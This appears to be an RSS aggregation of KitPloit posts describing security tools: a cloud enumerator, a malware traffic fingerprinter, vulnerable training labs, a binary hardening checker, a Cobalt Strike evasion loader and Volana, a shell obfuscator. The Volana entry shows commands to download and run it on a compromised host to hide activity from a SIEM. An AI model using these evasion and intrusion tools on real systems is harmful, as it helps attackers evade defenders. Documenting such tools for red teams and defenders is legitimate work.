FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ β˜† βœ‡ KitPloit - PenTest Tools!

CloudBrute - Awesome Cloud Enumerator

By: Zion3R β€” June 25th 2024 at 12:30


A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available. here


Motivation

we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:

  • separated wordlists
  • lack of proper concurrency
  • lack of supporting all major cloud providers
  • require authentication or keys or cloud CLI access
  • outdated endpoints and regions
  • Incorrect file storage detection
  • lack support for proxies (useful for bypassing region restrictions)
  • lack support for user agent randomization (useful for bypassing rare restrictions)
  • hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operation system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

It looks like this

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

in action

How to contribute

  • Add a module or fix something and then pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with community β™₯

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug open an issue.

When I use proxies, I get too many errors, or it's too slow?

It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

too fast or too slow ?

change -T (timeout) option to get best results for your run.

Credits

Inspired by every single repo listed here .



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Hfinger - Fingerprinting HTTP Requests

By: Zion3R β€” June 24th 2024 at 12:30


Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.

    The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation: * Python >= 3.3, * Tshark >= 2.2.0.

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ on represented request features or rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1 Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l/--log switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1 Hfinger uses logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze, you should configure hfinger logger, set log level to logging.INFO, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze function docstring.

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β‰ˆ2), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β‰ˆ1), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β‰ˆ0.6).

    Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.

    To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

    When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent

    When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N, and with A otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.

    Report modes

    Hfinger operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features, * mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4, * mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families, however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0, 1, and 4. Mode 3 produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.

    The modes consist of features (in the order of appearance in the fingerprint): * mode 0: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R β€” June 23rd 2024 at 12:30


    A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest node.js version with npm.
    • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
    • Run command: npm install

    DB setup

    • Install and configure latest mysql version and start the mysql service/deamon
    • Login with root user in mysql and run below sql script:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variable

    • User needs to set the below environment variable.
      • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
      • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
      • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
      • DATABASE_PASS (E.g: password or password you change in above DB script)

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerability covered

    • SQL Injection
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • External XML Entity Injection (XXE)
    • Node js Deserialization
    • Security Misconfiguration
    • Insecure Session Management

    TODO

    • Will add new vulnerabilities such as CORS, Template Injection, etc...
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issues on github.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach me out at @4auvar



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R β€” June 22nd 2024 at 12:30


    XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terafform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform init
    $ terraform plan -out <\FILENAME>
    $ terraform apply <\FILENAME>

    Where <\FILENAME> is the name of the output file

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.

    Cleaning up

    After completing the scenario, run the following command in order to clean all the resources created in your tenant

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform destroy


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

    By: Zion3R β€” June 21st 2024 at 12:30


    Analyse binaries for missing security features, information disclosure and more.

    Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


    Usage

    Usage:
    extrude [flags] [file]

    Flags:
    -a, --all Show details of all tests, not just those which failed.
    -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
    -h, --help help for extrude

    Docker

    You can optionally run extrude with docker via:

    docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

    Supported Checks

    ELF

    • PIE
    • RELRO
    • BIND NOW
    • Fortified Source
    • Stack Canary
    • NX Stack

    MachO

    • PIE
    • Stack Canary
    • NX Stack
    • NX Heap
    • ARC

    Windows

    Coming soon...

    TODO

    • Add support for PE
    • Add secret scanning
    • Detect packers


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BokuLoader - A Proof-Of-Concept Cobalt Strike Reflective Loader Which Aims To Recreate, Integrate, And Enhance Cobalt Strike's Evasion Features!

    By: Zion3R β€” June 20th 2024 at 15:41


    A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features!


    Contributors:

    Contributor Twitter Notable Contributions
    Bobby Cooke @0xBoku Project original author and maintainer
    Santiago Pecin @s4ntiago_p Reflective Loader major enhancements
    Chris Spehn @ConsciousHacker Aggressor scripting
    Joshua Magri @passthehashbrwn IAT hooking
    Dylan Tran @d_tranman Reflective Call Stack Spoofing
    James Yeung @5cript1diot Indirect System Calls

    UDRL Usage Considerations

    The built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage to using a custom UDRL is Malleable PE evasion features may or may not be supported out-of-the-box.

    The objective of the public BokuLoader project is to assist red teams in creating their own in-house Cobalt Strike UDRL. The project aims to support all worthwhile CS Malleable PE evasion features. Some evasion features leverage CS integration, others have been recreated completely, and some are unsupported.

    Before using this project, in any form, you should properly test the evasion features are working as intended. Between the C code and the Aggressor script, compilation with different versions of operating systems, compilers, and Java may return different results.

    Evasion Features

    BokuLoader Specific Evasion Features

    • Reflective callstack spoofing via synthetic frames.
    • Custom ASM/C reflective loader code
    • Indirect NT syscalls via HellsGate & HalosGate techniques
    • All memory protection changes for all allocation options are done via indirect syscall to NtProtectVirtualMemory
    • obfuscate "true" with custom UDRL Aggressor script implementation.
    • NOHEADERCOPY
    • Loader will not copy headers raw beacon DLL to virtual beacon DLL. First 0x1000 bytes will be nulls.
    • XGetProcAddress for resolving symbols
    • Does not use Kernel32.GetProcAddress
    • xLoadLibrary for resolving DLL's base address & DLL Loading
    • For loaded DLLs, gets DLL base address from TEB->PEB->PEB_LDR_DATA->InMemoryOrderModuleList
    • Does not use Kernel32.LoadLibraryA
    • Caesar Cipher for string obfuscation
    • 100k UDRL Size
    • Import DLL names and import entry name strings are stomped in virtual beacon DLL.

    Supported Malleable PE Evasion Features

    Command Option(s) Supported
    allocator HeapAlloc, MapViewOfFile, VirtualAlloc All supported via BokuLoader implementation
    module_x64 string (DLL Name) Supported via BokuLoader implementation. Same DLL stomping requirements as CS implementation apply
    obfuscate true/false HTTP/S beacons supported via BokuLoader implementation. SMB/TCP is currently not supported for obfuscate true. Details in issue. Accepting help if you can fix :)
    entry_point RVA as decimal number Supported via BokuLoader implementation
    cleanup true Supported via CS integration
    userwx true/false Supported via BokuLoader implementation
    sleep_mask (true/false) or (Sleepmask Kit+true) Supported. When using default "sleepmask true" (without sleepmask kit) set "userwx true". When using sleepmask kit which supports RX beacon.text memory (src47/Ekko) set "sleepmask true" && "userwx false".
    magic_mz_x64 4 char string Supported via CS integration
    magic_pe 2 char string Supported via CS integration
    transform-x64 prepend escaped hex string BokuLoader.cna Aggressor script modification
    transform-x64 strrep string string BokuLoader.cna Aggressor script modification
    stomppe true/false Unsupported. BokuLoader does not copy beacon DLL headers over. First 0x1000 bytes of virtual beacon DLL are 0x00
    checksum number Experimental. BokuLoader.cna Aggressor script modification
    compile_time date-time string Experimental. BokuLoader.cna Aggressor script modification
    image_size_x64 decimal value Unsupported
    name string Experimental. BokuLoader.cna Aggressor script modification
    rich_header escaped hex string Experimental. BokuLoader.cna Aggressor script modification
    stringw string Unsupported
    string string Unsupported

    Test

    Project Origins

    Usage

    1. Compile the BokuLoader Object file with make
    2. Start your Cobalt Strike Team Server
    3. Within Cobalt Strike, import the BokuLoader.cna Aggressor script
    4. Generate the x64 beacon (Attacks -> Packages -> Windows Executable (S))
    5. Use the Script Console to ensure BokuLoader was implemented in the beacon build

    6. Does not support x86 option. The x86 bin is the original Reflective Loader object file.

    7. Generating RAW beacons works out of the box. When using the Artifact Kit for the beacon loader, the stagesize variable must be larger than the default.
    8. See the Cobalt Strike User-Defined Reflective Loader documenation for additional information

    Detection Guidance

    Hardcoded Strings

    • BokuLoader changes some commonly detected strings to new hardcoded values. These strings can be used to signature BokuLoader:
    Original Cobalt Strike String BokuLoader Cobalt Strike String
    ReflectiveLoader BokuLoader
    Microsoft Base Cryptographic Provider v1.0 12367321236742382543232341241261363163151d
    (admin) (tomin)
    beacon bacons

    Memory Allocators

    DLL Module Stomping

    • The Kernel32.LoadLibraryExA is called to map the DLL from disk
    • The 3rd argument to Kernel32.LoadLibraryExA is DONT_RESOLVE_DLL_REFERENCES (0x00000001)
    • the system does not call DllMain
    • Does not resolve addresses in LDR PEB entry as detailed by MDSec here
    • Detectable by scanning process memory with pe-sieve tool

    Heap Allocation

    • Executable RX or RWX memory will exist in the heap if sleepmask kit is not used.

    Mapped Allocator

    • The Kernel32.CreateFileMappingA & Kernel32.MapViewOfFile is called to allocate memory for the virtual beacon DLL.

    Sleepmask Detection

    Indirect Syscalls

    • BokuLoader calls the following NT systemcalls to setup the loaded executable beacon memory: NtAllocateVirtualMemory, NtProtectVirtualMemory
    • These are called indirectly from the BokuLoader executable memory.
    • Setting userland hooks in ntdll.dll will not detect these systemcalls.
    • It may be possible to register kernelcallbacks using a kernel driver to monitor for the above system calls and detect their usage.
    • The BokuLoader itself will contain the mov eax, r11d; mov r11, r10; mov r10, rcx; jmp r11 assembly instructions within its executable memory.

    Virtual Beacon DLL Header

    • The first 0x1000 bytes of the virtual beacon DLL are zeros.

    Source Code Available

    • The BokuLoader source code is provided within the repository and can be used to create memory signatures.
    • If you have additional detection guidance, please feel free to contribute by submitting a pull request.

    Credits / References

    Reflective Call Stack Spoofing

    Reflective Loader

    HalosGate SysCaller

    • Reenz0h from @SEKTOR7net
    • Checkout Reenz0h's awesome courses and blogs!
    • Best classes for malware development I have taken.
    • Creator of the halos gate technique. His work was initially the motivation for this work.
    • Sektor7 HalosGate Blog

    HellsGate Syscaller

    Aggressor Scripting

    Cobalt Strike User Defined Reflective Loader

    • https://www.cobaltstrike.com/help-user-defined-reflective-loader

    Great Resource for learning Intel ASM

    ETW and AMSI Bypass

    Implementing ASM in C Code with GCC

    • https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/
    • https://www.cs.uaf.edu/2011/fall/cs301/lecture/10_12_asm_c.html
    • http://gcc.gnu.org/onlinedocs/gcc-4.0.2/gcc/Extended-Asm.html#Extended-Asm

    Cobalt Strike C2 Profiles



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Zion3R β€” June 19th 2024 at 12:30


    Shell command obfuscation to avoid SIEM/detection system

    During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

    volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


    Usage

    You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

    ## Download it from github release
    ## If you do not have internet access from compromised machine, find another way
    curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
    volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
    volana Β» [command]

    Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

    from non interactive shell

    Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

